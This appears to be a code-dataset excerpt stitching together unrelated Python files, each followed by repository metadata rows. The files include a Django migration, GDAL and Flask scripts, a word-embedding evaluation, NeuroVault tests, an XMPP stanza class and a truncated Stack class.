    switches Message's primary key to BigAutoField."""
    dependencies = [
        ('api', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Pavilhao',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('numero', models.IntegerField()),
            ],
        ),
        migrations.AlterField(
            model_name='message',
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
        migrations.CreateModel(
            name='Sentenciado',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=30)),
                ('matricula', models.CharField(max_length=50)),
                # Each Sentenciado belongs to a Pavilhao; deleting the
                # Pavilhao cascades.
                ('pavilhao', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.pavilhao')),
            ],
        ),
    ]
| 33.388889 | 117 | 0.578203 | 118 | 1,202 | 5.771186 | 0.474576 | 0.035242 | 0.096916 | 0.127753 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0.349486 | 0 | 0.025671 | 0.287022 | 1,202 | 35 | 118 | 34.342857 | 0.768961 | 0.035774 | 0 | 0.37931 | 1 | 0 | 0.079516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ca263d5ceb8c0df9da68a027a9e2c49d50656ac | 268 | py | Python | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | null | null | null | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | 1 | 2017-02-28T18:49:04.000Z | 2017-02-28T18:49:55.000Z | data/landice-5g/tiff_to_shp.py | scottsfarley93/IceSheetsViz | f4af84f16af875c5753dca6b8c173c253d9218d4 | [
"MIT"
] | null | null | null | import os
import subprocess

# Polygonize every raster in ./rasters into a shapefile in ./shapefiles.
for filename in os.listdir("rasters"):
    print(filename)
    base = filename.replace(".tiff", "")
    tiff = os.path.join("rasters", filename)
    out = os.path.join("shapefiles", base + ".shp")
    # Pass the command as an argument list instead of an os.system() shell
    # string, so filenames containing spaces or shell metacharacters cannot
    # break the command (and failures raise instead of being ignored).
    subprocess.check_call(
        ["gdal_polygonize.py", tiff, "-f", "ESRI Shapefile", out])
| 24.363636 | 70 | 0.589552 | 33 | 268 | 4.757576 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242537 | 268 | 10 | 71 | 26.8 | 0.773399 | 0 | 0 | 0 | 0 | 0 | 0.279851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ca33e888a8c5506799931e71fe1070bf6588145 | 3,758 | py | Python | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | 3 | 2018-05-31T05:52:18.000Z | 2019-12-20T07:15:56.000Z | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | null | null | null | we_sensesim.py | y95847frank/GenSense | 0da122bea9b7bd51444748444700b5f788bd8a48 | [
"MIT"
] | null | null | null | import numpy as np
import sys
import utils
import os
from collections import defaultdict
from nltk.corpus import wordnet as wn
from scipy.spatial.distance import cosine
from scipy.spatial.distance import correlation
from numpy.linalg import norm
from scipy.stats import spearmanr, pearsonr
from utils import trim
import pdb
"""
Sense embedding format: see https://github.com/sjauhar/SenseRetrofit
Use ',' to seperate Datasets
"""
def run(path, fname):
    """Evaluate sense embeddings on a list of word-similarity datasets.

    path  -- directory containing the evaluation dataset files
    fname -- list of dataset file names (one benchmark per entry)

    Prints Spearman correlations (max-sense and average-sense similarity)
    for each dataset.  NOTE(review): the embedding file is read from
    sys.argv[1], not from a parameter -- `path` only locates the datasets.
    This module uses Python 2 print statements.
    """
    '''
    if len(sys.argv) != 3:
        print("Usage: python we_sensesim.py SenseEmbedding Datasets")
        exit(0)
    '''
    #wvs = utils.readWordVecs(os.path.expanduser(full_path))
    wvs = utils.readWordVecs(sys.argv[1])
    print("Finish reading vector!")
    # Map each surface word to '' (membership set) and collect its sense
    # keys; sense keys look like "word%sense_id".
    wvssen = {}
    s_list = defaultdict(list)
    for sense in wvs:
        wvssen[sense.split("%")[0]] = ''
        s_list[sense.split("%")[0]].append(sense)
    # Fallback vector used for out-of-vocabulary words.
    mean_vector = np.mean(wvs.values(), axis=0)
    spear_score_max = []
    spear_score_avg = []
    f_name = []
    for name in fname:
        full_path = os.path.join(path, name)
        filenames = os.path.expanduser(full_path).split(',')
        pairs, scores = utils.readDataset(filenames[0], no_skip=True)
        #f_name.append(filenames[0])
        #print("Pair number for %s: %d"%(filenames[0], len(pairs)))
        coefs_max = []
        coefs_avg = []
        missing = 0
        for pair in pairs:
            # Gather all sense vectors for the first word (or the mean
            # vector when the word is missing from the vocabulary).
            vecs0 = []
            trimed_p0 = trim(pair[0], wvssen)
            if trimed_p0 not in wvssen:
                vecs0.append(mean_vector)
                missing += 1
                #print trimed_p0,
            else:
                for sense in s_list[trimed_p0]:
                    vecs0.append(wvs[sense])
                '''
                for sense in wvs:
                    word = sense.split("%")[0]
                    if trimed_p0 == word:
                        vecs0.append(wvs[sense])
                '''
            # Same for the second word of the pair.
            vecs1 = []
            trimed_p1 = trim(pair[1],wvssen)
            if trimed_p1 not in wvssen:
                vecs1.append(mean_vector)
                missing += 1
                #print trimed_p1,
            else:
                for sense in s_list[trimed_p1]:
                    vecs1.append(wvs[sense])
                '''
                for sense in wvs:
                    word = sense.split("%")[0]
                    if trimed_p1 == word:
                        vecs1.append(wvs[sense])
                '''
            '''
            max_value and avg_value: see "Multi-Prototype Vector-Space Models of Word Meaning" section 3.2 Measuring Semantic Similarity
            http://www.cs.utexas.edu/~ml/papers/reisinger.naacl-2010.pdf
            '''
            max_value = max([1-cosine(a,b) for a in vecs0 for b in vecs1])
            avg_value = np.mean([1-cosine(a,b) for a in vecs0 for b in vecs1])
            coefs_max.append(max_value)
            coefs_avg.append(avg_value)
        # Correlate predicted similarities with the gold scores.
        spear_max = spearmanr(scores, coefs_max)
        pearson_max = pearsonr(scores, coefs_max)
        spear_avg = spearmanr(scores, coefs_avg)
        pearson_avg = pearsonr(scores, coefs_avg)
        spear_score_max.append(spear_max[0])
        spear_score_avg.append(spear_avg[0])
    # Print a table: one column per dataset (Python 2 print statements).
    print 'type \t',
    for i in range(len(fname)):
        print fname[i].split('.')[0],
    print '\nspear max\t',
    for i in range(len(fname)):
        print '%.04f,' % (spear_score_max[i]),
    print '\nspear avg\t',
    for i in range(len(fname)):
        print '%.04f,' % (spear_score_avg[i]),
if __name__ == "__main__":
    # Evaluate against the standard similarity benchmarks shipped in ./eval_data.
    run('./eval_data', ['EN-MEN-n.txt', 'EN-MEN-l.txt', 'EN-TRUK.txt', 'EN-RW.txt', 'EN-WS353.txt', 'EN-WS353-s.txt', 'EN-WS353-r.txt'])
| 33.256637 | 140 | 0.549228 | 475 | 3,758 | 4.208421 | 0.307368 | 0.030015 | 0.025013 | 0.01951 | 0.245623 | 0.191596 | 0.191596 | 0.131566 | 0.11906 | 0.11906 | 0 | 0.024496 | 0.326503 | 3,758 | 112 | 141 | 33.553571 | 0.76531 | 0.045769 | 0 | 0.101449 | 0 | 0 | 0.065465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.173913 | null | null | 0.101449 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cab395492740b9b3d338ab6d9a913dcbe6912e1 | 1,327 | py | Python | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | src/pages/random.py | jojo935/Kemono2 | bdfaf0ab2dd3c2c4a04805feea8e9fb6193cbd9b | [
"BSD-3-Clause"
] | null | null | null | from flask import Blueprint, redirect, url_for, g
from ..utils.utils import make_cache_key
from ..internals.cache.redis import get_conn
from ..internals.cache.flask_cache import cache
from ..internals.database.database import get_cursor
from ..lib.artist import get_artist, get_random_artist_keys
from ..lib.post import get_post, get_random_posts_keys
from ..lib.ab_test import get_ab_variant
from ..utils.utils import get_value
import random as rand
random = Blueprint('random', __name__)


@random.route('/posts/random')
def random_post():
    """Redirect to a randomly picked post page, or back when none exist."""
    chosen = get_random_post()
    if chosen is None:
        return redirect('back')
    return redirect(url_for('post.get', service=chosen['service'], artist_id=chosen['user'], post_id=chosen['id']))
@random.route('/artists/random')
def random_artist():
    """Redirect to a randomly picked artist page, or back when none exist."""
    chosen = get_random_artist()
    if chosen is None:
        return redirect('back')
    return redirect(url_for('artists.get', service=chosen['service'], artist_id=chosen['id']))
def get_random_post():
    """Pick one post key at random from a pool of up to 1000; None if empty."""
    candidates = get_random_posts_keys(1000)
    if not candidates:
        return None
    return rand.choice(candidates)
def get_random_artist():
    """Pick one artist key at random from a pool of up to 1000; None if empty."""
    candidates = get_random_artist_keys(1000)
    if not candidates:
        return None
    return rand.choice(candidates)
| 30.159091 | 116 | 0.699322 | 187 | 1,327 | 4.716578 | 0.245989 | 0.081633 | 0.068027 | 0.045351 | 0.160998 | 0.160998 | 0.099773 | 0.099773 | 0.099773 | 0 | 0 | 0.009294 | 0.189148 | 1,327 | 43 | 117 | 30.860465 | 0.810409 | 0 | 0 | 0.121212 | 0 | 0 | 0.064642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.30303 | 0 | 0.666667 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0cac991dc2d4d32121af9b2da9f1960fba266638 | 917 | py | Python | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | benchmark_constructor/file_normalizers/ContactSelectFileNormalizer.py | Kortemme-Lab/benchmark_set_construct | ee6c9e097ff49d370936b41f102ada006fb4441a | [
"MIT"
] | null | null | null | import os
from .FileNormalizer import FileNormalizer
class ContactSelectFileNormalizer(FileNormalizer):
    '''Writes a pymol script that selects the residues which have
    contacts to asymmetric units.
    '''

    def __init__(self):
        pass

    def normalize_one_file(self, path, crystal_contact_res_set):
        """Write the pymol selection command for one structure to *path*.

        crystal_contact_res_set holds (chain, residue_number) pairs.
        """
        selection = 'select crystal_contact_res,' + ''.join(
            ' res {0} and chain {1}'.format(res[1], res[0])
            for res in crystal_contact_res_set)
        with open(path, 'w') as out_file:
            out_file.write(selection)

    def apply(self, info_dict):
        """Emit a <name>_show_crystal_contact.pml script beside each candidate
        structure that carries a 'crystal_contact_res_set' entry."""
        for structure_dict in info_dict['candidate_list']:
            directory = os.path.dirname(structure_dict['path'])
            script_name = '.'.join(
                [structure_dict['name'] + '_show_crystal_contact', 'pml'])
            if 'crystal_contact_res_set' in structure_dict.keys():
                self.normalize_one_file(
                    os.path.join(directory, script_name),
                    structure_dict['crystal_contact_res_set'])
| 31.62069 | 94 | 0.691385 | 122 | 917 | 4.92623 | 0.5 | 0.139767 | 0.141431 | 0.133111 | 0.076539 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005413 | 0.194111 | 917 | 28 | 95 | 32.75 | 0.807848 | 0.123228 | 0 | 0 | 0 | 0 | 0.181013 | 0.08481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0cac9d083e4dfd2daccd29d3da4102e79f646255 | 1,919 | py | Python | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 68 | 2015-02-07T06:09:49.000Z | 2022-03-03T22:58:33.000Z | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 436 | 2015-01-01T01:01:13.000Z | 2021-11-07T18:24:00.000Z | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 60 | 2015-01-10T23:31:26.000Z | 2021-08-10T06:39:57.000Z | import os
import nibabel as nb
import numpy as np
from django.test import TestCase
from neurovault.apps.statmaps.models import BaseStatisticMap
from neurovault.apps.statmaps.utils import is_thresholded, infer_map_type
class QATest(TestCase):
    """QA checks for is_thresholded and infer_map_type (Python 2 test file)."""
    def setUp(self):
        # Reference images: brain template, ROI map and parcellation atlas.
        this_path = os.path.abspath(os.path.dirname(__file__))
        self.brain = nb.load(os.path.join(this_path, "../static", "anatomical", "MNI152.nii.gz"))
        self.roi_map = nb.load(os.path.join(this_path, "test_data", "statmaps", "WA3.nii.gz"))
        self.parcellation = nb.load(os.path.join(this_path, "test_data", "TTatlas.nii.gz"))
        # We will fill in brain mask with this percentage of randomly placed values
        self.ratios = [0.0,0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.96, 0.98]
        # Expected is_thresholded verdict for each ratio above.
        self.thresholded = [False,False,False,False,False,False,False,False,False,True,True]
    def testThresholded(self):
        # Zero out an increasing fraction of voxels and check the detector
        # reports the zeroed fraction and the thresholded verdict.
        for p,t in zip(self.ratios, self.thresholded):
            empty_data = np.ones(self.brain.shape)
            if p != 0.0:
                number_voxels = int(np.floor(p * empty_data.size))
                random_idx = np.random.choice(range(empty_data.size), number_voxels, replace=False)
                empty_data[np.unravel_index(random_idx, empty_data.shape)] = 0
            empty_nii = nb.Nifti1Image(empty_data,affine=self.brain.get_affine(),header=self.brain.get_header())
            is_thr, ratio_bad = is_thresholded(nii_obj=empty_nii)
            print "Zeroed %s of values, is_thresholded returns [%s:%s]" %(p,is_thr,ratio_bad)
            self.assertAlmostEqual(p, ratio_bad, delta=0.001)
            self.assertEquals(t, is_thr)
    def testInferMapType(self):
        # ROI map -> R, parcellation -> Pa, plain anatomical -> OTHER.
        self.assertEquals(infer_map_type(self.roi_map), BaseStatisticMap.R)
        self.assertEquals(infer_map_type(self.parcellation), BaseStatisticMap.Pa)
        self.assertEquals(infer_map_type(self.brain), BaseStatisticMap.OTHER)
0caeebf4e3ed3af12c71f32665fdf047f4676dd8 | 497 | py | Python | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | null | null | null | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | 20 | 2019-02-04T21:57:59.000Z | 2019-02-10T21:50:17.000Z | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | null | null | null |
from functools import reduce
from itertools import groupby
from operator import add, itemgetter
def merge_records_by(key, combine):
    """Return a binary merge function for two records sharing the same *key*.

    The merged record keeps the keys of the first record; the *key* field is
    taken from the first record, every other field is combined with
    ``combine(first[field], second[field])``.
    """
    def merge(first, second):
        return {
            field: first[field] if field == key
            else combine(first[field], second[field])
            for field in first
        }
    return merge


def merge_list_of_records_by(key, combine):
    """Return a function that collapses a list of records, merging all
    records that share the same *key* value (output sorted by that value)."""
    by_key = itemgetter(key)
    merge_pair = merge_records_by(key, combine)

    def merge_all(records):
        ordered = sorted(records, key=by_key)
        return [
            reduce(merge_pair, group)
            for _, group in groupby(ordered, by_key)
        ]
    return merge_all
| 24.85 | 68 | 0.682093 | 69 | 497 | 4.782609 | 0.42029 | 0.081818 | 0.109091 | 0.172727 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227364 | 497 | 19 | 69 | 26.157895 | 0.859375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0.071429 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cb93959fe2a17c6bba6b5049a41d091d98ecf1d | 1,174 | py | Python | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | """
Slixmpp: The Slick XMPP Library
Copyright (C) 2020 "Maxime “pep” Buquet <pep@bouah.net>"
This file is part of Slixmpp.
See the file LICENSE for copying permission.
"""
from slixmpp.xmlstream import ElementBase
NS = 'urn:xmpp:occupant-id:0'
class OccupantId(ElementBase):
    '''
    An Occupant-id tag.

    An <occupant-id/> tag is set by the MUC.

    This is useful in semi-anon MUCs (and MUC-PMs) as a stable identifier to
    prevent the usual races with nicknames.

    Without occupant-id, getting the following messages from MUC history would
    prevent a client from asserting senders are the same entity:

      <message type='groupchat' from='foo@muc/nick1' id='message1'>
        <body>Some message</body>
        <occupant-id xmlns='urn:xmpp:occupant-id:0' id='unique-opaque-id1'/>
      </message>
      <message type='groupchat' from='foo@muc/nick2' id='message2'>
        <body>Some correction</body>
        <occupant-id xmlns='urn:xmpp:occupant-id:0' id='unique-opaque-id1'/>
        <replace xmlns='urn:xmpp:message-correct:0' id='message1'/>
      </message>
    '''
    # Element tag: <occupant-id/>.
    name = 'occupant-id'
    # XEP-0421 namespace (urn:xmpp:occupant-id:0).
    namespace = NS
    # Only the opaque 'id' attribute is exposed.
    interface = {'id'}
| 28.634146 | 78 | 0.663543 | 164 | 1,174 | 4.75 | 0.536585 | 0.115533 | 0.057766 | 0.065469 | 0.238768 | 0.215661 | 0.138639 | 0.138639 | 0.138639 | 0.138639 | 0 | 0.016181 | 0.210392 | 1,174 | 40 | 79 | 29.35 | 0.824164 | 0.764055 | 0 | 0 | 0 | 0 | 0.192308 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0cbd80d538ed5aeecd342647472ca2c49593352a | 3,110 | py | Python | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | null | null | null | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | 2 | 2016-11-29T19:48:27.000Z | 2016-12-09T17:18:56.000Z | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import json
import timeit
import re
import TaxPy.db_management.db_wrap as TaxDb
from itertools import izip
def retrieveReads(userName,fileName,fileId,parentTaxId,query):
    """Collect read lines for `parentTaxId` and every taxon beneath it.

    Loads the user's cached taxonomy tree, locates the subtree rooted at
    parentTaxId, gathers all descendant taxIds, then fetches the matching
    rows from the alignments database.  Per-stage timings are printed
    (Python 2 print statements).

    NOTE(review): `status` returned by findSubTree is overwritten below by
    getReadLines's row count before being returned.
    """
    time1 = timeit.default_timer()
    taxTree = loadTaxTree(userName,fileName)
    time2 = timeit.default_timer()
    print str(time2-time1)+" seconds loading tree"
    status,subTree = findSubTree(taxTree,parentTaxId)
    time3 = timeit.default_timer()
    print str(time3-time2)+" finding subtree"
    children = findChildren(subTree,[])
    time4 = timeit.default_timer()
    print str(time4-time3)+" finding children"
    readLines,status = getReadLines(children,fileId,query)
    time5 = timeit.default_timer()
    print str(time5-time4)+" getting read lines"
    return readLines,status
def findSubTree(tree, parentTaxId, found=False):
    """Depth-first search for the node whose taxId equals parentTaxId.

    Returns (True, subtree) on success and (False, None) when no node
    matches.  A truthy `found` short-circuits and returns `tree` itself.
    """
    result = None
    if int(tree["taxId"]) == int(parentTaxId) or found:
        return True, tree
    try:
        for child in tree["children"]:
            found, result = findSubTree(child, parentTaxId)
            if found:
                return True, result
    except KeyError:
        # Leaf node: no "children" key.
        pass
    return found, result
def findChildren(tree, children):
    """Collect the taxId of `tree` and of every descendant into `children`.

    The accumulator list is mutated in place (pre-order) and also returned.
    """
    children.append(tree["taxId"])
    try:
        for subtree in tree["children"]:
            children = findChildren(subtree, children)
    except KeyError:
        # Leaf node: no "children" key.
        pass
    return children
def loadTaxTree(userName, fileName):
    """Load the cached taxonomy tree for an uploaded file.

    The tree is stored as JSON at uploads/<userName>/<fileName>_tree.json.
    """
    jsonFile = "uploads/{0}/{1}_tree.json".format(userName, fileName)
    with open(jsonFile, "r") as handle:
        return json.load(handle)
def getReadLines(children,fileId,query):
    """Fetch the `query` column for every row whose taxId is in `children`.

    Returns (readLines, str(row_count)).

    NOTE(review): fileId/query/children are interpolated directly into the
    SQL text -- safe only while these come from trusted internal sources.
    """
    readLines = []
    count = 0
    with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
         TaxDb.cursor(db) as cur:
        # First count the matching rows, then fetch the requested column.
        cmd = "SELECT COUNT(*) FROM "+fileId+" WHERE taxId IN "
        # Render the python list as a SQL tuple literal: [1, 2] -> (1, 2).
        children = "("+str(children).lstrip("[").rstrip("]")+")"
        cmd += children
        cur.execute(cmd)
        nRows = cur.fetchall()[0][0]
        cmd = "SELECT "+query+" FROM "+fileId+" WHERE taxId IN "
        cmd += children + ";"
        cur.execute(cmd)
        for line in cur:
            readLines.append(line[0])
    return readLines,str(nRows)
def getReadsForTaxIds(userName,fileName,fileId,taxIds,query):
    """Fetch the `query` column for all rows matching any taxId in `taxIds`.

    userName/fileName are unused here; kept for interface parity with the
    sibling helpers.  taxId values are bound as query parameters.
    """
    readLines = []
    count = 0
    with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
         TaxDb.cursor(db) as cur:
        cmd = "SELECT "+query+" FROM "+fileId+" WHERE taxId IN (%s)"
        # Expand one parameter placeholder per taxId, then bind the values.
        in_p=', '.join(map(lambda x: '%s', taxIds))
        cmd = cmd % in_p
        cur.execute(cmd,taxIds)
        for line in cur:
            readLines.append(line[0])
    return readLines
def getReadsForGiInTaxId(userName,fileName,fileId,taxId,seqId,query):
    """Fetch the `query` column for rows matching both taxId and seqId.

    userName/fileName are unused here; kept for interface parity with the
    sibling helpers.  taxId and seqId are bound as query parameters.
    """
    with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
         TaxDb.cursor(db) as cur:
        cmd = "SELECT " + query + " FROM " + fileId + " WHERE taxId=%s AND seqId=%s"
        cur.execute(cmd, (taxId, seqId))
        rows = [row[0] for row in cur]
    return rows
| 27.280702 | 76 | 0.618971 | 355 | 3,110 | 5.385915 | 0.278873 | 0.050209 | 0.047071 | 0.048117 | 0.376569 | 0.285565 | 0.259414 | 0.259414 | 0.23954 | 0.23954 | 0 | 0.009142 | 0.261415 | 3,110 | 113 | 77 | 27.522124 | 0.823248 | 0.005145 | 0 | 0.361446 | 0 | 0 | 0.107986 | 0.021339 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.024096 | 0.060241 | null | null | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cc0bf99ee01e613b032f7efe713db47ddaef6b6 | 1,137 | py | Python | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 33 | 2019-05-27T13:04:35.000Z | 2022-03-17T13:33:05.000Z | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 31 | 2019-06-10T01:55:47.000Z | 2022-03-09T07:27:49.000Z | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 25 | 2019-05-13T18:39:24.000Z | 2021-11-16T03:07:33.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import enum
from typing import Optional
from ossdbtoolsservice.serialization import Serializable
class MetadataType(enum.Enum):
    """Contract enum for representing metadata types"""
    TABLE = 0
    VIEW = 1
    # Stored procedure.
    SPROC = 2
    FUNCTION = 3
class ObjectMetadata(Serializable):
    """Database object metadata"""

    @classmethod
    def get_child_serializable_types(cls):
        # Tells the serializer how to deserialize the nested enum field.
        return {'metadata_type': MetadataType}

    def __init__(self, urn: Optional[str] = None, metadata_type: Optional[MetadataType] = None, metadata_type_name: Optional[str] = None, name: Optional[str] = None, schema: Optional[str] = None):
        """All fields are optional; unset fields stay None."""
        self.metadata_type: Optional[MetadataType] = metadata_type
        self.metadata_type_name: Optional[str] = metadata_type_name
        self.name: Optional[str] = name
        self.schema: Optional[str] = schema
        self.urn: Optional[str] = urn
| 34.454545 | 156 | 0.591029 | 116 | 1,137 | 5.646552 | 0.5 | 0.128244 | 0.109924 | 0.058015 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004278 | 0.177661 | 1,137 | 32 | 157 | 35.53125 | 0.696257 | 0.358839 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.166667 | 0.055556 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0cc52afa5bda9e011a3f67aa407ce29b267af421 | 1,409 | py | Python | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed May 27 18:48:24 2020
@author: Christopher Cheng
"""
class Stack(object):
    """A simple LIFO stack backed by a Python list (top = end of list)."""

    def __init__(self):
        self.stack = []

    def get_stack_elements(self):
        """Return a shallow copy of the contents, bottom first."""
        return list(self.stack)

    def add_one(self, item):
        """Push a single item."""
        self.stack.append(item)

    def add_many(self, item, n):  # item is still a single value, pushed n times
